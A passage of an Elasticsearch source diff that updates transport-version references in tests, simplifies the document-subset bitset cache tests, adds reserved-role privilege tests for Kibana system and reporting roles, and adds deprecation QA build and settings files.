TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion() ); when(clusterState.getMinTransportVersion()).thenReturn(previousVersion); diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/async/AsyncResultsServiceTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/async/AsyncResultsServiceTests.java index 1c69a6a52951a..5e304530b064f 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/async/AsyncResultsServiceTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/async/AsyncResultsServiceTests.java @@ -231,8 +231,11 @@ public void testAssertExpirationPropagation() throws Exception { try { long startTime = System.currentTimeMillis(); task.setExpirationTime(startTime + TimeValue.timeValueMinutes(1).getMillis()); - - if (updateInitialResultsInStore) { + boolean taskCompleted = randomBoolean(); + if (taskCompleted) { + taskManager.unregister(task); + } + if (taskCompleted || updateInitialResultsInStore) { // we need to store initial result PlainActionFuture future = new PlainActionFuture<>(); indexService.createResponse( @@ -249,10 +252,11 @@ public void testAssertExpirationPropagation() throws Exception { // not waiting for completion, so should return immediately with timeout service.retrieveResult(new GetAsyncResultRequest(task.getExecutionId().getEncoded()).setKeepAlive(newKeepAlive), listener); listener.actionGet(TimeValue.timeValueSeconds(10)); - assertThat(task.getExpirationTime(), greaterThanOrEqualTo(startTime + newKeepAlive.getMillis())); - assertThat(task.getExpirationTime(), lessThanOrEqualTo(System.currentTimeMillis() + newKeepAlive.getMillis())); - - if (updateInitialResultsInStore) { + if (taskCompleted == false) { + assertThat(task.getExpirationTime(), greaterThanOrEqualTo(startTime + newKeepAlive.getMillis())); + assertThat(task.getExpirationTime(), lessThanOrEqualTo(System.currentTimeMillis() + newKeepAlive.getMillis())); + } + if (updateInitialResultsInStore || taskCompleted) { PlainActionFuture future = new PlainActionFuture<>(); indexService.getResponse(task.executionId, randomBoolean(), future); TestAsyncResponse response = future.actionGet(TimeValue.timeValueMinutes(10)); diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ccr/action/CcrStatsActionTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ccr/action/CcrStatsActionTests.java index b4389377dff34..217b22aec41c2 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ccr/action/CcrStatsActionTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ccr/action/CcrStatsActionTests.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.core.ccr.action; +import org.elasticsearch.TransportVersion; import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.core.TimeValue; @@ -56,6 +57,6 @@ public void testSerializationBwc() throws IOException { request.masterNodeTimeout(TimeValue.timeValueSeconds(randomFrom(20, 25, 30))); } assertSerialization(request, TransportVersionUtils.getPreviousVersion(TransportVersions.V_8_14_0)); - assertSerialization(request, TransportVersions.MINIMUM_CCS_VERSION); + assertSerialization(request, TransportVersion.minimumCCSVersion()); } } diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ml/action/ForecastJobActionRequestTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ml/action/ForecastJobActionRequestTests.java index ec7de261e9fa9..405e2797c0bc2 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ml/action/ForecastJobActionRequestTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ml/action/ForecastJobActionRequestTests.java @@ -56,7 +56,7 @@ public void testSetDuration_GivenZero() { } public void testSetDuration_GivenNegative() { - IllegalArgumentException e = expectThrows(IllegalArgumentException.class, () -> new Request().setDuration("-1s")); + IllegalArgumentException e = expectThrows(IllegalArgumentException.class, () -> new Request().setDuration("-1")); assertThat(e.getMessage(), equalTo("[duration] must be positive: [-1]")); } @@ -67,7 +67,7 @@ public void testSetExpiresIn_GivenZero() { } public void testSetExpiresIn_GivenNegative() { - IllegalArgumentException e = expectThrows(IllegalArgumentException.class, () -> new Request().setExpiresIn("-1s")); + IllegalArgumentException e = expectThrows(IllegalArgumentException.class, () -> new Request().setExpiresIn("-1")); assertThat(e.getMessage(), equalTo("[expires_in] must be non-negative: [-1]")); } } diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authc/AuthenticationTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authc/AuthenticationTests.java index 500f7cd5a9b44..bd7f82501ce13 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authc/AuthenticationTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authc/AuthenticationTests.java @@ -937,7 +937,7 @@ public void testMaybeRewriteMetadataForCrossClusterAccessAuthentication() throws // pick a version before that of the authentication instance to force a rewrite final TransportVersion olderVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion(authentication.getEffectiveSubject().getTransportVersion()) ); diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCacheTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCacheTests.java index 5369c95ad6fa7..db78d8eb33ede 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCacheTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCacheTests.java @@ -43,10 +43,6 @@ import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.IndexSettingsModule; import org.elasticsearch.test.MockLog; -import org.hamcrest.Matchers; -import org.junit.After; -import org.junit.Before; -import org.mockito.Mockito; import java.io.Closeable; import java.io.IOException; @@ -65,12 +61,13 @@ import static java.util.Collections.emptyList; import static java.util.Collections.emptyMap; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.lessThan; import static org.hamcrest.Matchers.not; import static org.hamcrest.Matchers.notNullValue; import static org.hamcrest.Matchers.nullValue; import static org.hamcrest.Matchers.sameInstance; -import static org.mockito.ArgumentMatchers.any; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; @@ -80,17 +77,6 @@ public class DocumentSubsetBitsetCacheTests extends ESTestCase { // This value is based on the internal implementation details of lucene's FixedBitSet // If the implementation changes, this can be safely updated to match the new ram usage for a single bitset private static final long EXPECTED_BYTES_PER_BIT_SET = 56; - private ExecutorService singleThreadExecutor; - - @Before - public void setUpExecutor() { - singleThreadExecutor = Executors.newSingleThreadExecutor(); - } - - @After - public void cleanUpExecutor() { - singleThreadExecutor.shutdown(); - } public void testSameBitSetIsReturnedForIdenticalQuery() throws Exception { final DocumentSubsetBitsetCache cache = newCache(Settings.EMPTY); @@ -103,7 +89,7 @@ public void testSameBitSetIsReturnedForIdenticalQuery() throws Exception { final BitSet bitSet2 = cache.getBitSet(query2, leafContext); assertThat(bitSet2, notNullValue()); - assertThat(bitSet2, Matchers.sameInstance(bitSet1)); + assertThat(bitSet2, sameInstance(bitSet1)); }); } @@ -272,7 +258,7 @@ public void testCacheRespectsAccessTimeExpiry() throws Exception { assertThat(bitSet2, notNullValue()); // Loop until the cache has less than 2 items, which mean that something we evicted - assertThat(cache.entryCount(), Matchers.lessThan(2)); + assertThat(cache.entryCount(), lessThan(2)); }, 100, TimeUnit.MILLISECONDS); @@ -288,42 +274,28 @@ public void testIndexLookupIsClearedWhenBitSetIsEvicted() throws Exception { .put(DocumentSubsetBitsetCache.CACHE_SIZE_SETTING.getKey(), maxCacheBytes + "b") .build(); - final ExecutorService executor = mock(ExecutorService.class); - final AtomicReference runnableRef = new AtomicReference<>(); - when(executor.submit(any(Runnable.class))).thenAnswer(inv -> { - final Runnable r = (Runnable) inv.getArguments()[0]; - runnableRef.set(r); - return null; - }); - - final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings, executor); + final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings); assertThat(cache.entryCount(), equalTo(0)); assertThat(cache.ramBytesUsed(), equalTo(0L)); runTestOnIndex((searchExecutionContext, leafContext) -> { + cache.verifyInternalConsistency(); + final Query query1 = QueryBuilders.termQuery("field-1", "value-1").toQuery(searchExecutionContext); final BitSet bitSet1 = cache.getBitSet(query1, leafContext); assertThat(bitSet1, notNullValue()); + cache.verifyInternalConsistency(); final Query query2 = QueryBuilders.termQuery("field-2", "value-2").toQuery(searchExecutionContext); final BitSet bitSet2 = cache.getBitSet(query2, leafContext); assertThat(bitSet2, notNullValue()); - - // BitSet1 has been evicted now, run the cleanup... - final Runnable runnable1 = runnableRef.get(); - assertThat(runnable1, notNullValue()); - runnable1.run(); cache.verifyInternalConsistency(); - // Check that the original bitset is no longer in the cache (a new instance is returned) assertThat(cache.getBitSet(query1, leafContext), not(sameInstance(bitSet1))); - - // BitSet2 has been evicted now, run the cleanup... - final Runnable runnable2 = runnableRef.get(); - assertThat(runnable2, not(sameInstance(runnable1))); - runnable2.run(); cache.verifyInternalConsistency(); }); + + cache.verifyInternalConsistency(); } public void testCacheUnderConcurrentAccess() throws Exception { @@ -337,23 +309,12 @@ public void testCacheUnderConcurrentAccess() throws Exception { .put(DocumentSubsetBitsetCache.CACHE_SIZE_SETTING.getKey(), maxCacheBytes + "b") .build(); + final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings); + assertThat(cache.entryCount(), equalTo(0)); + assertThat(cache.ramBytesUsed(), equalTo(0L)); + final ExecutorService threads = Executors.newFixedThreadPool(concurrentThreads + 1); - final ExecutorService cleanupExecutor = Mockito.mock(ExecutorService.class); - when(cleanupExecutor.submit(any(Runnable.class))).thenAnswer(inv -> { - final Runnable runnable = (Runnable) inv.getArguments()[0]; - return threads.submit(() -> { - // Sleep for a small (random) length of time. - // This increases the likelihood that cache could have been modified between the eviction & the cleanup - Thread.sleep(randomIntBetween(1, 10)); - runnable.run(); - return null; - }); - }); try { - final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings, cleanupExecutor); - assertThat(cache.entryCount(), equalTo(0)); - assertThat(cache.ramBytesUsed(), equalTo(0L)); - runTestOnIndices(numberOfIndices, contexts -> { final CountDownLatch start = new CountDownLatch(concurrentThreads); final CountDownLatch end = new CountDownLatch(concurrentThreads); @@ -394,12 +355,12 @@ public void testCacheUnderConcurrentAccess() throws Exception { threads.shutdown(); assertTrue("Cleanup thread did not complete in expected time", threads.awaitTermination(3, TimeUnit.SECONDS)); - cache.verifyInternalConsistency(); + cache.verifyInternalConsistencyKeysToCache(); // Due to cache evictions, we must get more bitsets than fields - assertThat(uniqueBitSets.size(), Matchers.greaterThan(FIELD_COUNT)); + assertThat(uniqueBitSets.size(), greaterThan(FIELD_COUNT)); // Due to cache evictions, we must have seen more bitsets than the cache currently holds - assertThat(uniqueBitSets.size(), Matchers.greaterThan(cache.entryCount())); + assertThat(uniqueBitSets.size(), greaterThan(cache.entryCount())); // Even under concurrent pressure, the cache should hit the expected size assertThat(cache.entryCount(), is(maxCacheCount)); assertThat(cache.ramBytesUsed(), is(maxCacheBytes)); @@ -407,62 +368,41 @@ public void testCacheUnderConcurrentAccess() throws Exception { } finally { threads.shutdown(); } + + cache.verifyInternalConsistencyKeysToCache(); } - public void testCleanupWorksWhenIndexIsClosing() throws Exception { + public void testCleanupWorksWhenIndexIsClosed() throws Exception { // Enough to hold slightly more than 1 bit-set in the cache final long maxCacheBytes = EXPECTED_BYTES_PER_BIT_SET + EXPECTED_BYTES_PER_BIT_SET / 2; final Settings settings = Settings.builder() .put(DocumentSubsetBitsetCache.CACHE_SIZE_SETTING.getKey(), maxCacheBytes + "b") .build(); - final ExecutorService threads = Executors.newFixedThreadPool(1); - final ExecutorService cleanupExecutor = Mockito.mock(ExecutorService.class); - final CountDownLatch cleanupReadyLatch = new CountDownLatch(1); - final CountDownLatch cleanupCompleteLatch = new CountDownLatch(1); - final CountDownLatch indexCloseLatch = new CountDownLatch(1); - final AtomicReference cleanupException = new AtomicReference<>(); - when(cleanupExecutor.submit(any(Runnable.class))).thenAnswer(inv -> { - final Runnable runnable = (Runnable) inv.getArguments()[0]; - return threads.submit(() -> { - try { - cleanupReadyLatch.countDown(); - assertTrue("index close did not completed in expected time", indexCloseLatch.await(1, TimeUnit.SECONDS)); - runnable.run(); - } catch (Throwable e) { - logger.warn("caught error in cleanup thread", e); - cleanupException.compareAndSet(null, e); - } finally { - cleanupCompleteLatch.countDown(); - } - return null; - }); - }); - final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings, cleanupExecutor); + final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings); assertThat(cache.entryCount(), equalTo(0)); assertThat(cache.ramBytesUsed(), equalTo(0L)); - try { - runTestOnIndex((searchExecutionContext, leafContext) -> { - final Query query1 = QueryBuilders.termQuery("field-1", "value-1").toQuery(searchExecutionContext); - final BitSet bitSet1 = cache.getBitSet(query1, leafContext); - assertThat(bitSet1, notNullValue()); + runTestOnIndex((searchExecutionContext, leafContext) -> { + final Query query1 = QueryBuilders.termQuery("field-1", "value-1").toQuery(searchExecutionContext); + final BitSet bitSet1 = cache.getBitSet(query1, leafContext); + assertThat(bitSet1, notNullValue()); + cache.verifyInternalConsistency(); - // Second query should trigger a cache eviction - final Query query2 = QueryBuilders.termQuery("field-2", "value-2").toQuery(searchExecutionContext); - final BitSet bitSet2 = cache.getBitSet(query2, leafContext); - assertThat(bitSet2, notNullValue()); + // Second query should trigger a cache eviction + final Query query2 = QueryBuilders.termQuery("field-2", "value-2").toQuery(searchExecutionContext); + final BitSet bitSet2 = cache.getBitSet(query2, leafContext); + assertThat(bitSet2, notNullValue()); + cache.verifyInternalConsistency(); - final IndexReader.CacheKey indexKey = leafContext.reader().getCoreCacheHelper().getKey(); - assertTrue("cleanup did not trigger in expected time", cleanupReadyLatch.await(1, TimeUnit.SECONDS)); - cache.onClose(indexKey); - indexCloseLatch.countDown(); - assertTrue("cleanup did not complete in expected time", cleanupCompleteLatch.await(1, TimeUnit.SECONDS)); - assertThat("caught error in cleanup thread: " + cleanupException.get(), cleanupException.get(), nullValue()); - }); - } finally { - threads.shutdown(); - } + final IndexReader.CacheKey indexKey = leafContext.reader().getCoreCacheHelper().getKey(); + cache.onClose(indexKey); + cache.verifyInternalConsistency(); + + // closing an index results in the associated entries being removed from the cache (at least when single threaded) + assertThat(cache.entryCount(), equalTo(0)); + assertThat(cache.ramBytesUsed(), equalTo(0L)); + }); } public void testCacheIsPerIndex() throws Exception { @@ -492,7 +432,7 @@ public void accept(SearchExecutionContext searchExecutionContext, LeafReaderCont runTestOnIndex(consumer); } - public void testCacheClearEntriesWhenIndexIsClosed() throws Exception { + public void testCacheClearsEntriesWhenIndexIsClosed() throws Exception { final DocumentSubsetBitsetCache cache = newCache(Settings.EMPTY); assertThat(cache.entryCount(), equalTo(0)); assertThat(cache.ramBytesUsed(), equalTo(0L)); @@ -504,9 +444,13 @@ public void testCacheClearEntriesWhenIndexIsClosed() throws Exception { final BitSet bitSet = cache.getBitSet(query, leafContext); assertThat(bitSet, notNullValue()); } + cache.verifyInternalConsistency(); assertThat(cache.entryCount(), not(equalTo(0))); assertThat(cache.ramBytesUsed(), not(equalTo(0L))); }); + cache.verifyInternalConsistency(); + + // closing an index results in the associated entries being removed from the cache (at least when single threaded) assertThat(cache.entryCount(), equalTo(0)); assertThat(cache.ramBytesUsed(), equalTo(0L)); } @@ -650,7 +594,7 @@ private void runTestOnIndices(int numberIndices, CheckedConsumer { + final IndexAbstraction indexAbstraction = mockIndexAbstraction(indexName); + assertThat(kibanaRole.indices().allowedIndicesMatcher("indices:foo").test(indexAbstraction), is(false)); + assertThat(kibanaRole.indices().allowedIndicesMatcher("indices:bar").test(indexAbstraction), is(false)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportDeleteIndexAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(GetIndexAction.NAME).test(indexAbstraction), is(true)); + assertThat( + kibanaRole.indices().allowedIndicesMatcher(TransportCreateIndexAction.TYPE.name()).test(indexAbstraction), + is(false) + ); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportIndexAction.NAME).test(indexAbstraction), is(false)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportDeleteAction.NAME).test(indexAbstraction), is(false)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportSearchAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportMultiSearchAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportGetAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(READ_CROSS_CLUSTER_NAME).test(indexAbstraction), is(false)); + assertThat( + kibanaRole.indices().allowedIndicesMatcher(TransportUpdateSettingsAction.TYPE.name()).test(indexAbstraction), + is(true) + ); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportPutMappingAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(RolloverAction.NAME).test(indexAbstraction), is(true)); + // Implied by the overall view_index_metadata and monitor privilege + assertViewIndexMetadata(kibanaRole, indexName); + assertThat(kibanaRole.indices().allowedIndicesMatcher("indices:monitor/").test(indexAbstraction), is(true)); + }); Arrays.asList( @@ -1877,6 +1913,48 @@ public void testKibanaSystemRole() { assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportPutMappingAction.TYPE.name()).test(indexAbstraction), is(true)); assertThat(kibanaRole.indices().allowedIndicesMatcher(RolloverAction.NAME).test(indexAbstraction), is(true)); }); + + // Tests for third-party agent indices (ExtraHop, QualysGAV, SentinelOne) that `kibana_system` has full management access to + // This includes read, write, create, delete, and all ILM-related management actions. + Arrays.asList( + "logs-extrahop.investigation-" + randomAlphaOfLength(randomIntBetween(1, 10)), + "logs-qualys_gav.asset-" + randomAlphaOfLength(randomIntBetween(1, 10)), + "logs-sentinel_one.application-" + randomAlphaOfLength(randomIntBetween(1, 10)) + ).forEach((index_qualys_extra_hop) -> { + final IndexAbstraction indexAbstraction = mockIndexAbstraction(index_qualys_extra_hop); + + // Assert Read Actions (Allowed by "read") + assertThat(kibanaRole.indices().allowedIndicesMatcher(GetIndexAction.NAME).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportSearchAction.TYPE.name()).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportGetAction.TYPE.name()).test(indexAbstraction), is(true)); + + // Assert Write & Delete Document Actions (Allowed by "write", "index", "delete") + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportIndexAction.NAME).test(indexAbstraction), is(true)); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportDeleteAction.NAME).test(indexAbstraction), is(true)); + // The "update" action is also implicitly part of "write" + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportUpdateAction.NAME).test(indexAbstraction), is(true)); + + // Assert Index Management Actions (Allowed by "create_index", "delete_index", and "manage") + // Allowed by the explicit "create_index" privilege + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportCreateIndexAction.TYPE.name()).test(indexAbstraction), is(true)); + // Allowed by the explicit TransportDeleteIndexAction + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportDeleteIndexAction.TYPE.name()).test(indexAbstraction), is(true)); + + // Allowed due to the "manage" privilege and explicit TransportAutoPutMappingAction + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportPutMappingAction.TYPE.name()).test(indexAbstraction), is(true)); + // Allowed due to the explicit TransportIndicesAliasesAction + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportIndicesAliasesAction.NAME).test(indexAbstraction), is(true)); + // Rollover requires 'manage' on the alias and 'create_index', both of which are granted. + assertThat(kibanaRole.indices().allowedIndicesMatcher(RolloverAction.NAME).test(indexAbstraction), is(true)); + + // Assert Denied Actions + // This role should not have cross-cluster permissions on these indices + assertThat(kibanaRole.indices().allowedIndicesMatcher(READ_CROSS_CLUSTER_NAME).test(indexAbstraction), is(false)); + + // A check against a completely different index should fail + final IndexAbstraction otherIndex = mockIndexAbstraction("some-unrelated-index"); + assertThat(kibanaRole.indices().allowedIndicesMatcher(TransportSearchAction.TYPE.name()).test(otherIndex), is(false)); + }); } public void testKibanaAdminRole() { @@ -2687,20 +2765,11 @@ public void testReportingUserRole() { RoleDescriptor roleDescriptor = ReservedRolesStore.roleDescriptor("reporting_user"); assertNotNull(roleDescriptor); assertThat(roleDescriptor.getMetadata(), hasEntry("_reserved", true)); + assertThat(roleDescriptor.getMetadata(), hasEntry("_deprecated", true)); final String applicationName = "kibana-.kibana"; - final Set applicationPrivilegeNames = Set.of( - "feature_discover.minimal_read", - "feature_discover.generate_report", - "feature_dashboard.minimal_read", - "feature_dashboard.generate_report", - "feature_dashboard.download_csv_report", - "feature_canvas.minimal_read", - "feature_canvas.generate_report", - "feature_visualize.minimal_read", - "feature_visualize.generate_report" - ); + final Set applicationPrivilegeNames = Set.of("reserved_reporting_user"); final Set allowedApplicationActionPatterns = Set.of( "login:", diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/termsenum/TransportTermsEnumActionTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/termsenum/TransportTermsEnumActionTests.java index 975d08eb45277..e2e667be587a2 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/termsenum/TransportTermsEnumActionTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/termsenum/TransportTermsEnumActionTests.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.termsenum; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.TimeValue; @@ -67,11 +66,11 @@ public void onFailure(final Exception e) { /** * Test that triggering the CCS compatibility check with a query that shouldn't go to the minor before - * TransportVersions.MINIMUM_CCS_VERSION works + * TransportVersion.minimumCCSVersion() works */ public void testCCSCheckCompatibility() throws Exception { TermsEnumRequest request = new TermsEnumRequest().field("field").timeout(TimeValue.timeValueSeconds(5)); - TransportVersion version = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion version = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); request.indexFilter(new DummyQueryBuilder() { @Override public TransportVersion getMinimalSupportedVersion() { diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedAggregationBuilder.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedAggregationBuilder.java index 8b5806a869c8e..d0903077a08f8 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedAggregationBuilder.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.transform; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.logging.DeprecationCategory; @@ -99,6 +98,6 @@ public static MockDeprecatedAggregationBuilder fromXContent(XContentParser p) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedQueryBuilder.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedQueryBuilder.java index 145263beb0eb3..a3e447fafcf6b 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedQueryBuilder.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/transform/MockDeprecatedQueryBuilder.java @@ -9,7 +9,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -88,6 +87,6 @@ protected int doHashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/template-resources/src/main/resources/kibana-reporting@template.json b/x-pack/plugin/core/template-resources/src/main/resources/kibana-reporting@template.json index 109979208c496..74256872aa0cf 100644 --- a/x-pack/plugin/core/template-resources/src/main/resources/kibana-reporting@template.json +++ b/x-pack/plugin/core/template-resources/src/main/resources/kibana-reporting@template.json @@ -10,6 +10,9 @@ "template": { "lifecycle": {}, "mappings": { + "_meta": { + "template_version": ${xpack.stack.template.version} + }, "properties": { "meta": { "properties": { diff --git a/x-pack/plugin/deprecation/qa/build.gradle b/x-pack/plugin/deprecation/qa/build.gradle index e69de29bb2d1d..49af65e680d62 100644 --- a/x-pack/plugin/deprecation/qa/build.gradle +++ b/x-pack/plugin/deprecation/qa/build.gradle @@ -0,0 +1,41 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +apply plugin: 'elasticsearch.internal-java-rest-test' +// Necessary to use tests in Serverless +apply plugin: 'elasticsearch.internal-test-artifact' + +dependencies { + javaRestTestImplementation project(path: ':x-pack:plugin:deprecation:qa:common') + javaRestTestImplementation("com.fasterxml.jackson.core:jackson-annotations:${versions.jackson}") + javaRestTestImplementation("com.fasterxml.jackson.core:jackson-databind:${versions.jackson}") + + clusterModules project(':x-pack:plugin:deprecation:qa::early-deprecation-plugin') + clusterModules project(':x-pack:plugin:deprecation:qa::deprecation-plugin') + clusterModules project(':modules:ingest-common') + clusterModules project(':modules:mapper-extras') + clusterModules project(':modules:data-streams') + clusterModules project(xpackModule('stack')) + clusterModules project(xpackModule('deprecation')) + clusterModules project(xpackModule('ilm')) + clusterModules project(xpackModule('ml')) + clusterModules project(xpackModule('mapper-constant-keyword')) + clusterModules project(xpackModule('wildcard')) + clusterModules project(xpackModule('transform')) +} + +restResources { + restApi { + include '_common', 'indices', 'index' + } +} + +// Test clusters run with security disabled +tasks.named("javaRestTest") { + buildParams.withFipsEnabledOnly(it) +} + diff --git a/x-pack/plugin/deprecation/qa/common/src/main/java/org/elasticsearch/xpack/deprecation/DeprecationSettings.java b/x-pack/plugin/deprecation/qa/common/src/main/java/org/elasticsearch/xpack/deprecation/DeprecationSettings.java new file mode 100644 index 0000000000000..b6b1e8262f812 --- /dev/null +++ b/x-pack/plugin/deprecation/qa/common/src/main/java/org/elasticsearch/xpack/deprecation/DeprecationSettings.java @@ -0,0 +1,46 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.deprecation; + +import org.elasticsearch.common.settings.Setting; + +public class DeprecationSettings { + public static final Setting TEST_DEPRECATED_SETTING_TRUE1 = Setting.boolSetting( + "test.setting.deprecated.true1", + true, + Setting.Property.NodeScope, + Setting.Property.DeprecatedWarning, + Setting.Property.Dynamic + ); + public static final Setting TEST_DEPRECATED_SETTING_TRUE2 = Setting.boolSetting( + "test.setting.deprecated.true2", + true, + Setting.Property.NodeScope, + Setting.Property.DeprecatedWarning, + Setting.Property.Dynamic + ); + public static final Setting TEST_DEPRECATED_SETTING_TRUE3 = Setting.boolSetting( + "test.setting.deprecated.true3", + true, + Setting.Property.NodeScope, + Setting.Property.Deprecated, + Setting.Property.Dynamic + ); + public static final Setting TEST_NOT_DEPRECATED_SETTING = Setting.boolSetting( + "test.setting.not_deprecated", + false, + Setting.Property.NodeScope, + Setting.Property.Dynamic + ); + + public static final String DEPRECATED_ENDPOINT = "[/_test_cluster/deprecated_settings] exists for deprecated tests"; + public static final String DEPRECATED_USAGE = "[deprecated_settings] usage is deprecated. use [settings] instead"; + public static final String DEPRECATED_WARN_USAGE = + "[deprecated_warn_settings] usage is deprecated but won't be breaking in next version"; + public static final String COMPATIBLE_API_USAGE = "You are using a compatible API for this request"; +} diff --git a/x-pack/plugin/deprecation/qa/deprecation-plugin/build.gradle b/x-pack/plugin/deprecation/qa/deprecation-plugin/build.gradle new file mode 100644 index 0000000000000..cf4546dd06e03 --- /dev/null +++ b/x-pack/plugin/deprecation/qa/deprecation-plugin/build.gradle @@ -0,0 +1,20 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +apply plugin: 'elasticsearch.base-internal-es-plugin' +apply plugin: 'elasticsearch.build' + +esplugin { + name = 'deprecation-plugin' + description = 'Deprecated query plugin' + classname ='org.elasticsearch.xpack.deprecation.plugin.TestDeprecationPlugin' +} + +dependencies { + compileOnly project(":server") + implementation project(':x-pack:plugin:deprecation:qa::common') +} 